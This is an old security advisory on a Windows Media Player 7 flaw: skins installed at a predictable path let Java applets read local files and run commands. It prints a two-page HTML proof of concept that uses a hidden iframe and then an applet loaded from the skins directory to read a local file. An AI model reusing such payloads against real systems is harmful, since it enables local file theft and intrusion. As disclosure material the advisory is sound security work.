Reported January 15, 2001, by Win2KSecAdvice

VERSIONS AFFECTED
  • Windows Media Player 7

DESCRIPTION

A high-risk vulnerability has been discovered in Windows Media Player 7. The vulnerability lets an intruder read local files, browse a directory, and execute arbitrary commands. Windows Media Player installs skins in a known directory with a known name that is accessible by using Java applets, thus causing this vulnerability.

DEMONSTRATION

The following code was provided by Georgi Guninski:

--------wmp7-3.html--------------------------------------------------

<IFRAME SRC="wmp2.wmz" WIDTH=1 HEIGHT=1></IFRAME>
<SCRIPT>
function f()
\{
window.open("wmp7-3a.html");
\}
setTimeout("f()",4000);
</SCRIPT>

---------------------------------------------------------------------

------wmp7-3a.html---------------------------------------------------

<APPLET CODEBASE="file://c:/"
ARCHIVE="Program files/Windows Media Player/SKINS/wmp2.wmz"
CODE="gjavacodebase.class"
WIDTH=700 HEIGHT=300>

<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</APPLET>

---------------------------------------------------------------------

VENDOR RESPONSE

Unfortunately, Georgi Guninski chose to inform Microsoft of this vulnerability on January 11, 2001, giving Microsoft only 1 business day to address the issue. I contacted Microsoft regarding this issue, and the company has assured me that is working on a fix.

CREDIT
Discovered by
Georgi Gunski.